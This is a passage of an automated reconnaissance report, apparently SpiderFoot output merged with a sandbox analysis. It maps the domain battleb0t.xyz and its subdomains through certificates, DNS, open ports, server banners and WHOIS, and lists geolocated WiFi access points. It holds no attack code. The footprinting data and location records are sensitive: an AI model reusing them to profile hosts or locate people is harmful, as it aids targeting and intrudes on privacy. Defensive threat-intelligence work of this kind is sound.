u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 00000000-00001948)'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2936"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_IE_EarlyTabStart_0x580_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_ConnHashTable<2936>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b78_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "DBWinMutex"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b78_IESQMMUTEX_0_331"\n "IsoScope_b78_IESQMMUTEX_0_519"\n "IsoScope_b78_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabFDC0.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002576]\n "~DF3E880A0438641726.TMP" has type "data"- Location: [%TEMP%\\~DF3E880A0438641726.TMP]- [targetUID: 00000000-00002936]\n "TarFDEF.tmp" has type "data"- Location: [%TEMP%\\TarFDEF.tmp]- [targetUID: 00000000-00002576]\n "~DF1BC890B88EE71D3E.TMP" has type 
"data"- Location: [%TEMP%\\~DF1BC890B88EE71D3E.TMP]- [targetUID: 00000000-00002936]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002936]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002936]\n "~DFA7CC1D957708F1CF.TMP" has type "data"- Location: [%TEMP%\\~DFA7CC1D957708F1CF.TMP]- [targetUID: 00000000-00002936]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002936]\n "CabFDC0.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabFDC0.tmp]- [targetUID: 00000000-00002576]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002936]\n "QOCAT697.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QOCAT697.txt]- [targetUID: 00000000-00002936]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002936]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002576]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00002576]\n "M5GPFNCR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\M5GPFNCR.txt]- [targetUID: 00000000-00002936]\n "441474DA509340201AE7BB4EF094648C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\441474DA509340201AE7BB4EF094648C]- [targetUID: 00000000-00002576]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002936]\n "~DF9E4F20B7A536AEA1.TMP" has type "data"- Location: [%TEMP%\\~DF9E4F20B7A536AEA1.TMP]- [targetUID: 00000000-00002936]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /kb/email-address-types-explained HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.mailhardener.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_34.74.170.74]\n\n "HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:7d63747b-487e-492a-872d-762362f77974\nX-Response-Cache-Status: True\nExpires: Thu, 28 Jul 2022 00:27:42 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Thu, 28 Jul 2022 00:27:42 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"- [Source: SSL_96.6.31.32]'}, {u'category': u'Network Related', u'origin': u'File/Memory', 
u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.mailhardener.com/kb/email-address-types-explained"- [Source: Input]\n Pattern match: "https://www.mailhardener.com"- [Source: Input]\n Heuristic match: "x1.c.lencr.org" | 34.74.170.74 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TexasTech94 (Net ID: 8C:3B:AD:4D:21:5C) | 37.751, -97.822 |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:80 | 188.114.96.0/24 |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | scoop.sh | 185.199.108.153 |
| 2023-05-12 02:54:18 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | body{
padding-top:70px;
}
.jumbotron{
color: #2c3e50;
background-color: #ecf0f1;
}
.navbar-inverse{
color: #2c3e50;
}
.navbar-inverse .navbar-nav>li>a {
color: white;
}
.navbar-inverse .navbar-brand{
color: white;
} | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_phone-2 (Net ID: 00:0C:E6:8A:9F:66) | 50.8897, 6.0563 |
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CE:03:E9:CB:9A:4D:5E:BB:32:45:93:FC:78:CC:A3:7F:08:26:B1:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 18:26:26.989 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 18:26:27.535 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan47 (Net ID: 00:02:6F:08:21:E6) | 37.7642, -122.3993 |
| 2023-05-12 02:55:21 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | OpenBSD OpenSSH 8.9p1 | 207.154.228.169 |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | akashpmani.github.io | 185.199.108.153 |
| 2023-05-12 02:54:07 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5445d12f8c1040-ORD
Content-Encoding: gzip
| 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 4 | 0 | 2 | 0 | None | Go Daddy, LLC | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
